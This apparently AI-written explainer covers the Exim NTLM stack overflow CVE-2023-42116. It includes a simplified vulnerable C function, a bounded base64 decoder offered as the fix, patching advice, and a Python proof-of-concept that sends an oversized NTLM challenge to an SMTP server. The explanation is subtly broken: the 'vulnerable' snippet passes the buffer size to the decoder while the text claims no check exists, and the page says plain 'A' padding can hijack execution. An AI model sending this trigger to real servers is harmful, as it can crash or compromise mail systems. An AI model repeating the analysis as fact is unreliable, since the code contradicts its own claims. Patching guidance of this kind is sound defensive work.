Exim, the popular mail transfer agent used by millions of servers worldwide, has been hit by a serious vulnerability—CVE-2023-42116. If you’re running Exim, especially with NTLM authentication enabled, you need to pay close attention. This long-read will break down the vulnerability, how it can be exploited, and why it's so dangerous—all in simple terms, accompanied by code snippets and links to authoritative sources.
What is CVE-2023-42116?
CVE-2023-42116, also known as ZDI-CAN-17515, is a stack-based buffer overflow vulnerability in Exim's handling of NTLM challenge requests during SMTP authentication. Because Exim is often run under privileged accounts and exposed directly to the internet, this flaw gives remote attackers a powerful foothold.
- What’s affected? Exim mail servers with NTLM authentication enabled.
- What can go wrong? Remote, unauthenticated attackers can send carefully crafted SMTP messages to execute malicious code on the server—no password or login needed.
How Does It Work? (The Technical Lowdown)
NTLM is an authentication protocol supported by Exim for SMTP authentication. The bug lies in how Exim processes the base64-decoded challenge requests. Specifically, it doesn’t check if the decoded challenge is too long before copying it into a fixed-size stack buffer.
Here’s the vulnerable code, simplified for clarity (base64_decode stands in for Exim's real decoding routine):

#include <stddef.h>

void smtp_ntlm_challenge(const char *challenge_b64) {
    char challenge[256];        /* fixed-size stack buffer */
    size_t challenge_len;

    /* Supposed to decode the base64 NTLM challenge into the buffer here */
    challenge_len = base64_decode(challenge_b64, challenge, sizeof(challenge));
    /* The call above doesn't validate whether challenge_b64 decodes to more
       than 256 bytes, so a longer challenge runs off the end of the buffer */

    /* ...processing continues... */
}
Key Problem: If the base64 decoding results in more than 256 bytes, the extra data will overwrite other items on the stack—a classic buffer overflow.
- Send a specially crafted base64-encoded NTLM challenge that decodes to more than 256 bytes.
- This overflows the stack, corrupts memory, and allows the attacker to execute arbitrary code under the Exim process account.
- No valid credentials are needed—the attacker just needs network access.
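The missing check, shown as an added C example written for this post rather than taken from Exim's source: a base64 decoder that tests the bound before every write, and a hardened handler modelled on the snippet above that rejects any challenge which would not fit in the 256-byte buffer. The function names, the CHALLENGE_MAX limit (taken from the snippet), and the sample inputs (a constructed 12-byte challenge and 'A' runs of various lengths, including the 300-byte run the proof-of-concept encodes) are assumptions made for illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define CHALLENGE_MAX 256   /* the fixed buffer size from the snippet above */

/* Map one base64 alphabet character to its 6-bit value, or -1 if invalid. */
static int b64_value(char c) {
    if (c >= 'A' && c <= 'Z') return c - 'A';
    if (c >= 'a' && c <= 'z') return c - 'a' + 26;
    if (c >= '0' && c <= '9') return c - '0' + 52;
    if (c == '+') return 62;
    if (c == '/') return 63;
    return -1;
}

/* Decode a NUL-terminated base64 string (optional '=' padding) into dst.
 * Returns the number of bytes written, or -1 if the input is malformed or
 * the decoded output would exceed dst_size. The bound is checked before
 * every write, so dst is never overrun even on error. */
long b64_decode_bounded(const char *src, unsigned char *dst, size_t dst_size) {
    size_t out = 0;
    uint32_t acc = 0;   /* bit accumulator, holds fewer than 14 bits at a time */
    int bits = 0;
    for (const char *p = src; *p != '\0'; p++) {
        if (*p == '=') break;               /* padding: no more data */
        int v = b64_value(*p);
        if (v < 0) return -1;               /* not a base64 character */
        acc = (acc << 6) | (uint32_t)v;
        bits += 6;
        if (bits >= 8) {
            bits -= 8;
            if (out >= dst_size) return -1; /* the check the vulnerable code lacks */
            dst[out++] = (unsigned char)((acc >> bits) & 0xFF);
            acc &= (1u << bits) - 1;        /* keep only the unconsumed bits */
        }
    }
    return (long)out;
}

/* Hardened counterpart of the page's smtp_ntlm_challenge(): decode into the
 * same fixed stack buffer, but reject the message when it does not fit.
 * Returns the decoded length, or -1 when the challenge is rejected. */
long smtp_ntlm_challenge_checked(const char *challenge_b64) {
    unsigned char challenge[CHALLENGE_MAX];
    long n = b64_decode_bounded(challenge_b64, challenge, sizeof(challenge));
    if (n < 0)
        return -1;  /* oversized or malformed: abort the AUTH exchange */
    /* ...processing of the decoded challenge would continue here... */
    return n;
}

/* Constructed sample input: base64 of the 12 bytes "NTLMSSP\0\x02\0\0\0". */
const char *sample_challenge(void) { return "TlRMTVNTUAACAAAA"; }

/* Constructed input generator: base64 of n 'A' bytes written into out,
 * which must hold at least 4 * ceil(n / 3) + 1 characters. A run of 'A'
 * only ever needs the three fixed base64 groups used below. */
const char *a_run_challenge(size_t n, char *out) {
    size_t pos = 0;
    for (; n >= 3; n -= 3, pos += 4) memcpy(out + pos, "QUFB", 4); /* "AAA" */
    if (n == 1) { memcpy(out + pos, "QQ==", 4); pos += 4; }          /* "A"   */
    else if (n == 2) { memcpy(out + pos, "QUE=", 4); pos += 4; }     /* "AA"  */
    out[pos] = '\0';
    return out;
}

/* Result of the hardened handler for a challenge decoding to n 'A' bytes
 * (n <= 1000); n = 300 matches the page's overflow_bytes payload. */
long check_a_run(size_t n) {
    static char buf[4 * (1000 / 3 + 1) + 1];
    if (n > 1000) return -1;
    return smtp_ntlm_challenge_checked(a_run_challenge(n, buf));
}

int main(void) {
    printf("12-byte sample challenge  -> %ld\n", smtp_ntlm_challenge_checked(sample_challenge()));
    printf("256-byte challenge (fits) -> %ld\n", check_a_run(256));
    printf("257-byte challenge        -> %ld\n", check_a_run(257));
    printf("300-byte challenge (PoC)  -> %ld\n", check_a_run(300));
    return 0;
}
```

The point of the design is that the length decision is made inside the decoder, before the byte is stored, rather than after the fact: a 256-byte challenge is accepted in full, a 257-byte one is refused without any byte landing past the buffer, and the decoder also fails closed on characters outside the base64 alphabet instead of guessing.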
Proof-of-Concept Steps
Here’s a sample Python snippet for how an attacker would initiate the exploit (for research, NOT for unauthorized use):
import base64
import socket
target_ip = 'mail.example.com'
target_port = 25
# Craft an NTLM challenge that decodes to >256 bytes
overflow_bytes = b'A' * 300
encoded_challenge = base64.b64encode(overflow_bytes).decode()
s = socket.socket()
s.connect((target_ip, target_port))
s.sendall(b'EHLO attacker\r\n')
s.sendall(b'AUTH NTLM\r\n')
# Send the malicious challenge
s.sendall((encoded_challenge + '\r\n').encode())
If Exim is vulnerable, this challenge will cause a buffer overflow—potentially letting the code inside overflow_bytes hijack execution.
- Privileges Gained: Typically the “exim” user, but in some sloppy setups possibly root
- Affected Versions: Confirmed on Exim versions up to 4.96; check advisories for your specific build
- Public Exploits?: As of this writing, proof-of-concepts exist, and weaponized exploits may be available privately
Mitigation and Response
- Patch Immediately: Check Exim’s Security Advisories and your package maintainer's site for an update or patch.
- Disable NTLM: If you don’t absolutely need it, disable NTLM authentication to reduce your risk.
References & Further Reading
- CVE Database Entry
- Exim Official Security Advisory
- Zero Day Initiative Advisory (ZDI-CAN-17515)
- NVD - National Vulnerability Database
- Base64 Decoding Buffer Overflow Writeup (Stack Overflow)
Conclusion
CVE-2023-42116 is a critical vulnerability in Exim born from a simple programming oversight: not checking the real size of data before copying. Because Exim handles so much of the world’s email, and because this flaw lets unauthenticated attackers run code, it’s an “everyone patch now” moment.
If you run Exim, audit your configs, patch ASAP, and consider hardening authentication modules. Some bugs can’t wait.
Stay safe; patch early!
*Exclusive content by ChatGPT, based on publicly available advisories and security sources as of June 2024.*
Timeline
Published on: 05/03/2024 03:15:50 UTC